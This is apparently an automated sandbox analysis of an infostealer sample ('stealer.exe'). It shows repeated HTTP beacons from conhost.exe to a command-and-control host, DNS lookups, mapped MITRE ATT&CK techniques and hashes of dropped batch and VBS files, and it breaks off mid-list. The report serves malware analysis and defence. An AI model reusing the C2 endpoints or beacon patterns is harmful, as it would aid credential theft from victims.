GET /_Defaultwindows.php?ZQ8gXH0vD5Ou3BMnbD=ZZqraPNM7MJRUfknpg3pE&pM5OmYSB5KEnYJtjiQJ=2j4o4OTXgHhXjztdvLmy35Q8MqHa3&8mgI=GSRTXF5eynqEjaQxWoVB7S6&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&ZQ8gXH0vD5Ou3BMnbD=ZZqraPNM7MJRUfknpg3pE&pM5OmYSB5KEnYJtjiQJ=2j4o4OTXgHhXjztdvLmy35Q8MqHa3&8mgI=GSRTXF5eynqEjaQxWoVB7S6 HTTP/1.1
Accept: */*
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: a0947008.xsph.ru

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:30:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding

216.58.201.99:443

https://gstatic.com/generate_204

tls, http

stealer.exe

752 B
4.9kB
9
9

HTTP Request

GET https://gstatic.com/generate_204

HTTP Response

204
141.8.192.103:80

http://a0947008.xsph.ru/_Defaultwindows.php?eH=EnzyH6vNhRW7JFUUrF1ebVeq&h5L038jqgFY80hnjyjZvfJCXa=5nnRsIICjAjWnSwRmA6V0iN4nvF4RY2&Z4C6DOWPzy7m9b6G8OgCbEIWZs=6CNuLIv7sP0NYnqgCkl5L&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&eH=EnzyH6vNhRW7JFUUrF1ebVeq&h5L038jqgFY80hnjyjZvfJCXa=5nnRsIICjAjWnSwRmA6V0iN4nvF4RY2&Z4C6DOWPzy7m9b6G8OgCbEIWZs=6CNuLIv7sP0NYnqgCkl5L

http

conhost.exe

3.5kB
118.5kB
47
88

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?eH=EnzyH6vNhRW7JFUUrF1ebVeq&h5L038jqgFY80hnjyjZvfJCXa=5nnRsIICjAjWnSwRmA6V0iN4nvF4RY2&Z4C6DOWPzy7m9b6G8OgCbEIWZs=6CNuLIv7sP0NYnqgCkl5L&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&eH=EnzyH6vNhRW7JFUUrF1ebVeq&h5L038jqgFY80hnjyjZvfJCXa=5nnRsIICjAjWnSwRmA6V0iN4nvF4RY2&Z4C6DOWPzy7m9b6G8OgCbEIWZs=6CNuLIv7sP0NYnqgCkl5L

HTTP Response

403

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?eH=EnzyH6vNhRW7JFUUrF1ebVeq&h5L038jqgFY80hnjyjZvfJCXa=5nnRsIICjAjWnSwRmA6V0iN4nvF4RY2&Z4C6DOWPzy7m9b6G8OgCbEIWZs=6CNuLIv7sP0NYnqgCkl5L&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&eH=EnzyH6vNhRW7JFUUrF1ebVeq&h5L038jqgFY80hnjyjZvfJCXa=5nnRsIICjAjWnSwRmA6V0iN4nvF4RY2&Z4C6DOWPzy7m9b6G8OgCbEIWZs=6CNuLIv7sP0NYnqgCkl5L

HTTP Response

403
141.8.192.103:80

http://a0947008.xsph.ru/_Defaultwindows.php?A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK

http

conhost.exe

3.4kB
118.5kB
49
88

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK

HTTP Response

403

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK

HTTP Response

403
141.8.192.103:80

http://a0947008.xsph.ru/_Defaultwindows.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR

http

conhost.exe

4.4kB
118.5kB
69
88

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR

HTTP Response

403

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR

HTTP Response

403
141.8.192.103:80

http://a0947008.xsph.ru/_Defaultwindows.php?swfl=XC83nrKa89&n7jdLToRA5ohI9l7GLBmyMDTj1k2S=9PPoFwsW2ZHNlVsez4CtEO7XGb4P3&tw9F6ZRe3yP=SmekkrkEBp0i0uR2ho2ccipU&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&swfl=XC83nrKa89&n7jdLToRA5ohI9l7GLBmyMDTj1k2S=9PPoFwsW2ZHNlVsez4CtEO7XGb4P3&tw9F6ZRe3yP=SmekkrkEBp0i0uR2ho2ccipU

http

conhost.exe

3.6kB
118.5kB
53
88

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?swfl=XC83nrKa89&n7jdLToRA5ohI9l7GLBmyMDTj1k2S=9PPoFwsW2ZHNlVsez4CtEO7XGb4P3&tw9F6ZRe3yP=SmekkrkEBp0i0uR2ho2ccipU&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&swfl=XC83nrKa89&n7jdLToRA5ohI9l7GLBmyMDTj1k2S=9PPoFwsW2ZHNlVsez4CtEO7XGb4P3&tw9F6ZRe3yP=SmekkrkEBp0i0uR2ho2ccipU

HTTP Response

403

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?swfl=XC83nrKa89&n7jdLToRA5ohI9l7GLBmyMDTj1k2S=9PPoFwsW2ZHNlVsez4CtEO7XGb4P3&tw9F6ZRe3yP=SmekkrkEBp0i0uR2ho2ccipU&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&swfl=XC83nrKa89&n7jdLToRA5ohI9l7GLBmyMDTj1k2S=9PPoFwsW2ZHNlVsez4CtEO7XGb4P3&tw9F6ZRe3yP=SmekkrkEBp0i0uR2ho2ccipU

HTTP Response

403
141.8.192.103:80

http://a0947008.xsph.ru/_Defaultwindows.php?cWOZXYTZLghgtV=6CSfVGRuZA&2MqOXLbuKUKPFuRcSR=yVwepayvBSL&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&cWOZXYTZLghgtV=6CSfVGRuZA&2MqOXLbuKUKPFuRcSR=yVwepayvBSL

http

conhost.exe

3.2kB
118.5kB
47
88

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?cWOZXYTZLghgtV=6CSfVGRuZA&2MqOXLbuKUKPFuRcSR=yVwepayvBSL&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&cWOZXYTZLghgtV=6CSfVGRuZA&2MqOXLbuKUKPFuRcSR=yVwepayvBSL

HTTP Response

403

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?cWOZXYTZLghgtV=6CSfVGRuZA&2MqOXLbuKUKPFuRcSR=yVwepayvBSL&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&cWOZXYTZLghgtV=6CSfVGRuZA&2MqOXLbuKUKPFuRcSR=yVwepayvBSL

HTTP Response

403
141.8.192.103:80

http://a0947008.xsph.ru/_Defaultwindows.php?L8aIH7nBB5QvwHJRi58DdXUZpD1dM=SGFeF5iLipUm9QaadYAtl0ypb&nAdDFJzOmKqRCNtXWSs0XE8Okc=cLcSZCQRhrfjLxv&QuLWwAOdf7lajCPdnrWDK=QOv6Lp1thDlaseZGqc68wbb0sfcB&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&L8aIH7nBB5QvwHJRi58DdXUZpD1dM=SGFeF5iLipUm9QaadYAtl0ypb&nAdDFJzOmKqRCNtXWSs0XE8Okc=cLcSZCQRhrfjLxv&QuLWwAOdf7lajCPdnrWDK=QOv6Lp1thDlaseZGqc68wbb0sfcB

http

conhost.exe

3.9kB
118.5kB
53
88

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?L8aIH7nBB5QvwHJRi58DdXUZpD1dM=SGFeF5iLipUm9QaadYAtl0ypb&nAdDFJzOmKqRCNtXWSs0XE8Okc=cLcSZCQRhrfjLxv&QuLWwAOdf7lajCPdnrWDK=QOv6Lp1thDlaseZGqc68wbb0sfcB&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&L8aIH7nBB5QvwHJRi58DdXUZpD1dM=SGFeF5iLipUm9QaadYAtl0ypb&nAdDFJzOmKqRCNtXWSs0XE8Okc=cLcSZCQRhrfjLxv&QuLWwAOdf7lajCPdnrWDK=QOv6Lp1thDlaseZGqc68wbb0sfcB

HTTP Response

403

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?L8aIH7nBB5QvwHJRi58DdXUZpD1dM=SGFeF5iLipUm9QaadYAtl0ypb&nAdDFJzOmKqRCNtXWSs0XE8Okc=cLcSZCQRhrfjLxv&QuLWwAOdf7lajCPdnrWDK=QOv6Lp1thDlaseZGqc68wbb0sfcB&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&L8aIH7nBB5QvwHJRi58DdXUZpD1dM=SGFeF5iLipUm9QaadYAtl0ypb&nAdDFJzOmKqRCNtXWSs0XE8Okc=cLcSZCQRhrfjLxv&QuLWwAOdf7lajCPdnrWDK=QOv6Lp1thDlaseZGqc68wbb0sfcB

HTTP Response

403
141.8.192.103:80

http://a0947008.xsph.ru/_Defaultwindows.php?CAARenpr=X2SmldoAz8aLUhEGmBiy&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&CAARenpr=X2SmldoAz8aLUhEGmBiy

http

conhost.exe

3.1kB
118.5kB
47
88

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?CAARenpr=X2SmldoAz8aLUhEGmBiy&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&CAARenpr=X2SmldoAz8aLUhEGmBiy

HTTP Response

403

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?CAARenpr=X2SmldoAz8aLUhEGmBiy&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&CAARenpr=X2SmldoAz8aLUhEGmBiy

HTTP Response

403
141.8.192.103:80

http://a0947008.xsph.ru/_Defaultwindows.php?Pqm0MRr8hqb=MKVYyjDtEXmVD43kJ&EfTf=hM&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&Pqm0MRr8hqb=MKVYyjDtEXmVD43kJ&EfTf=hM

http

conhost.exe

3.3kB
118.5kB
53
88

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?Pqm0MRr8hqb=MKVYyjDtEXmVD43kJ&EfTf=hM&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&Pqm0MRr8hqb=MKVYyjDtEXmVD43kJ&EfTf=hM

HTTP Response

403

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?Pqm0MRr8hqb=MKVYyjDtEXmVD43kJ&EfTf=hM&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&Pqm0MRr8hqb=MKVYyjDtEXmVD43kJ&EfTf=hM

HTTP Response

403
141.8.192.103:80

http://a0947008.xsph.ru/_Defaultwindows.php?NFGawaH5OaHotuT=0gd0BHAkOVZ3IvBpF9HAQ&1qPIYEb9IZ13YAxvaFFfLb=Ow&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&NFGawaH5OaHotuT=0gd0BHAkOVZ3IvBpF9HAQ&1qPIYEb9IZ13YAxvaFFfLb=Ow

http

conhost.exe

3.2kB
118.5kB
49
88

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?NFGawaH5OaHotuT=0gd0BHAkOVZ3IvBpF9HAQ&1qPIYEb9IZ13YAxvaFFfLb=Ow&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&NFGawaH5OaHotuT=0gd0BHAkOVZ3IvBpF9HAQ&1qPIYEb9IZ13YAxvaFFfLb=Ow

HTTP Response

403

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?NFGawaH5OaHotuT=0gd0BHAkOVZ3IvBpF9HAQ&1qPIYEb9IZ13YAxvaFFfLb=Ow&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&NFGawaH5OaHotuT=0gd0BHAkOVZ3IvBpF9HAQ&1qPIYEb9IZ13YAxvaFFfLb=Ow

HTTP Response

403
141.8.192.103:80

http://a0947008.xsph.ru/_Defaultwindows.php?ZQ8gXH0vD5Ou3BMnbD=ZZqraPNM7MJRUfknpg3pE&pM5OmYSB5KEnYJtjiQJ=2j4o4OTXgHhXjztdvLmy35Q8MqHa3&8mgI=GSRTXF5eynqEjaQxWoVB7S6&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&ZQ8gXH0vD5Ou3BMnbD=ZZqraPNM7MJRUfknpg3pE&pM5OmYSB5KEnYJtjiQJ=2j4o4OTXgHhXjztdvLmy35Q8MqHa3&8mgI=GSRTXF5eynqEjaQxWoVB7S6

http

conhost.exe

3.6kB
118.5kB
51
88

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?ZQ8gXH0vD5Ou3BMnbD=ZZqraPNM7MJRUfknpg3pE&pM5OmYSB5KEnYJtjiQJ=2j4o4OTXgHhXjztdvLmy35Q8MqHa3&8mgI=GSRTXF5eynqEjaQxWoVB7S6&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&ZQ8gXH0vD5Ou3BMnbD=ZZqraPNM7MJRUfknpg3pE&pM5OmYSB5KEnYJtjiQJ=2j4o4OTXgHhXjztdvLmy35Q8MqHa3&8mgI=GSRTXF5eynqEjaQxWoVB7S6

HTTP Response

403

HTTP Request

GET http://a0947008.xsph.ru/_Defaultwindows.php?ZQ8gXH0vD5Ou3BMnbD=ZZqraPNM7MJRUfknpg3pE&pM5OmYSB5KEnYJtjiQJ=2j4o4OTXgHhXjztdvLmy35Q8MqHa3&8mgI=GSRTXF5eynqEjaQxWoVB7S6&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&ZQ8gXH0vD5Ou3BMnbD=ZZqraPNM7MJRUfknpg3pE&pM5OmYSB5KEnYJtjiQJ=2j4o4OTXgHhXjztdvLmy35Q8MqHa3&8mgI=GSRTXF5eynqEjaQxWoVB7S6

HTTP Response

403

8.8.8.8:53

gstatic.com

dns

stealer.exe

57 B
73 B
1
1

DNS Request

gstatic.com

DNS Response

216.58.201.99
8.8.8.8:53

a0947008.xsph.ru

dns

conhost.exe

62 B
78 B
1
1

DNS Request

a0947008.xsph.ru

DNS Response

141.8.192.103

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MsWinsessiondllNet\driverBrokercommon.exe

Filesize
2.3MB

MD5
d84e590c3715c79dc5b92c435957d162

SHA1
2901580903e4b356448d9fe7bea510261e655363

SHA256
d81c1097d231fdcb536974ef025f230d1c4091bab3edcf4f9da9344b44b638ba

SHA512
b797cdb43776a7e8a19f9c93299857d8f88651e13c7ba5ddb57f0ac0b24c7b98e6cc6c20ae1561948fb49774edad31cd237f40c9c690d34923ffee56bc02a485

Download Submit
C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat

Filesize
158B

MD5
ea70d7b0f1a8a1ff2d246efbdcfe1001

SHA1
252e762aee8fcc5761e17bb84aa3af8276852f5c

SHA256
1947411b5329e6db696c2354b56290b82aaf58b5f5d75fd4f3315fbe27999e31

SHA512
1fd28c415177644e069ded3e0ab3d27105fdac2d76f1060abb127e1961f310c81559e4c1213e61a7f32583cee9f4560106cafc88f0f20cf470edb756aadbec86

Download Submit
C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe

Filesize
218B

MD5
7c9bb5fda146efee5ee4a243d6e404b0

SHA1
c2fb82a9efb3a2469e6a120ac4781a7fe26eb3dd

SHA256
1d4b4c4da6c16a2701cec1c24ff21168d26d4f81c0ac8b3e30ed01b8468d488b

SHA512
797e74b283e74a3282223d8035408d55269e4451a289e3873ea197624985121c87dccdbdef42ff99fd8b4d1fd7e856388444e3fc699a9d6b061499682a043771

Download Submit
C:\Users\Admin\AppData\Local\Temp\0a0a1e6e-5481-4639-ae8b-5fea2ac76621.vbs

Filesize
702B

MD5
54a4ab02c1f992df21647e3a4b609dc5

SHA1
933dfdeb84d9634a6c29605a5b445b9769ad7beb

SHA256
45919df7cf84c7ef28302c045d59dc8ca5f77e79d70d1b1f85d1e524b70f5a1a

SHA512
fc32ad4184906f96c4562c1544644c7c17901ce058030a6894d15639d93b73b9cf7d2a94acb0641a0c06089ceb990543cb359de3e3b420ee6622725542946b9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\0cd5995c-5c03-4040-b512-619c1eccbcb3.vbs

Filesize
702B

MD5
033de561bdc7c0ca00ad0401bb082688

SHA1
2e8f6980e6b56f46c045a55803efb854595df75c

SHA256
3dc818abd994a8ef72851ff07a297b8cd5cfdb9b5fefd67328a8927985b7da5a

SHA512
61c4b381627f40b831a08cbf5b57245c720791bf693b378ca929731522847d68d6455047735fce7a590b769dcd1414dc2169e9ac1214a3dd4a778a580d2dba8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\2b170f59-441c-4133-a8dc-1297c5cdbc6a.vbs

Filesize
702B

MD5
6febe70bd4b9501ff665cbdc618847c5

SHA1
8840b48e3ef3baea97cf136db5020255a96e71fa

SHA256
65970a84b910cd3e31c2bd70c919c6c82bd47b6b0e590df373ca10a0f2fe8f72

SHA512
1da13ac7bee6e3dbef7d9088449033483b17c0b2765be7c33defc945185c4ff402febe3d7498c2aef859ac01dd2b136e1e7531632bf0c6ebf93db01fd48342fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\39f25686-6a3e-4eda-875d-a5be55c4b30d.vbs

Filesize
702B

MD5
5ee3bd681f680cdc5518b286570b28c2

SHA1
d86da3820b4d08031f5f263e727eb12c0881bea1

SHA256
3ab21a3c8c8b8584c7d35ab76d6556fe281666bee0880baef4490a719a56b989

SHA512
77585d574d8dcc0fa257c5cd11b38b0f616e74726cc4a3fd6f11d99e19ce9f3e38f6521ef43ea61d3ea59223101c2f067853a046c4edda3f9dfcf2113d557e96

Download Submit
C:\Users\Admin\AppData\Local\Temp\54d1267b-f558-4723-a5e9-e5e7f7b12168.vbs

Filesize
702B

MD5
dcee4dce741bd20ca0db644c2c5e46e7

SHA1
11db5b4398b3f46aee65d3381bde7ba7143c22d6

SHA256
6d725edfb7ccbf27477df652f4334171a691e9c731681c805a7d84ebd9269177

SHA512
24efe9c8faea46acf6d3f5692ad6fb1292fd065e87196ca7cf4b46eec1ce17619936cb81a053b289ca7451e32b83f139dd12554497ef8374628fdc563907553d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7b4f4761-f16f-4de3-b5fb-0923ce7bdfea.vbs

Filesize
702B

MD5
11cbace0608b5facaec85f9ab63a2743

SHA1
071f69516a7bb9d86edeae73d13b72a3ced7abdd

SHA256
a038ca5a1d89a8b89fbdce7c537dde8c878644cb4a509bac4e7386945c4bb713

SHA512
dc18040ec489320b1e060ad2ae8ca3d148812e88e99a38967b49b23e57d91c0e42d1943c5bbce6800dbb7ad10e042dd0a9bb64772fd9ed8d18e8399b632e6021

Download Submit
C:\Users\Admin\AppData\Local\Temp\93f16f6c-47c0-4cae-90c5-45b4dc351db8.vbs

Filesize
478B

MD5
8abcd2ae172afeb4ff08339b8fcffc25

SHA1
c19f781edabe30c1d1fbf2bb7cc970456eacd060

SHA256
1e5334f0d108336af7b8d597f3937ceb35a057922ace5b3e61e45a6cf48e0a6b

SHA512
2876bb2c9f8ac0aeb72f0bba3f907ed3dba9e5322cd28d8875d55a6a784e80d4bc032582b5977811bd6db659887e8397cca7f1aef603ec8b974936196313605f

Download Submit
C:\Users\Admin\AppData\Local\Temp\9c5e5929-4054-4c15-bacf-e767c8424da0.vbs

Filesize
702B

MD5
4b6b46eab9c52b28d9814e7abd31baaf

SHA1
bafcefe324854d398d6f8bb506d593f59a72c3bf

SHA256
58c2bb82bf82371de06c2d3a7cad22c24e5f9e4bd94f4bf415436d5b1cc2f395

SHA512
24b6981da8cde1d9be8ddad6e5feb7c9e2a4f1b90cf2c84f5f7f4393cefcfe70a70801e16ed5aa26b008907608280297aeb565c993e7590d2149c93dbe693692

Download Submit
C:\Users\Admin\AppData\Local\Temp\9e1306a1-7d80-41d9-a54a-66f1727dc77c.vbs

Filesize
702B

MD5
e6be198e9b7e5ce620d555dd8c3ffcf0

SHA1
4a172a1ae35f9a8cd67943c9981612467d3d45c8

SHA256
7c097f6b2f439250559ea809c39f4bdff6acb0ee7a172aaa26d2d7a6aa5245ae

SHA512
fb542d4cc53e0468211623a8b37930f9b889fec67458cf17c3e67282f2814de916705996d2663fa3e2ce1f51269e413771ceeb524f644eda09c0f6d4747cdea6

Download Submit
C:\Users\Admin\AppData\Local\Temp\UaJRNF11a2.bat

Filesize
191B

MD5
f7d10cf8a502ea71bc4cf2823a716694

SHA1
1a03facad61a8d1b448da90c60aa10b2ec73125a

SHA256
e2aa65fb4d4586edde781afee4a2c45456983110fecf37800b48ca47921a6c71

SHA512
53df9b650686d54d3e80c1a416b98e9353a89a09d3e4884212ab42a2dced1f0b400f76afc298d1d868c5504736de7ab4694a408c12358d295242937a4547d09c

Download Submit
C:\Users\Admin\AppData\Local\Temp\c1b0d6d0-77d3-4654-9345-549cd621ce7f.vbs

Filesize
702B

MD5
d6c220096df3c66a29f927f521da8e5f

SHA1
572d59a219f371433f29b5a1d10f45193cffba20

SHA256
e17e34086e8e29048ccadf5e5ea9bf57643d6f834b380086e623c92dd23af439

SHA512
8351d2c62e13732494b9979bd7a563cf88e1c7ccc0896adaef32ee5fff4ae758c998aaf413292124a8d46f5bdfaa9c7e519de03093091107c0683b93510ddbc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\d78b4399-8139-4837-973a-f2f0f90fe745.vbs

Filesize
702B

MD5
9ae89897944358d29f5cffdc7ae53012

SHA1
ac33a9b6cf573f9af6b47b488a7aef5f5a6a90d7

SHA256
f90b4075a640a9f6e66fd66a99e12cc0b28d5a3dd7481a94538e4adfb52fed57

SHA512
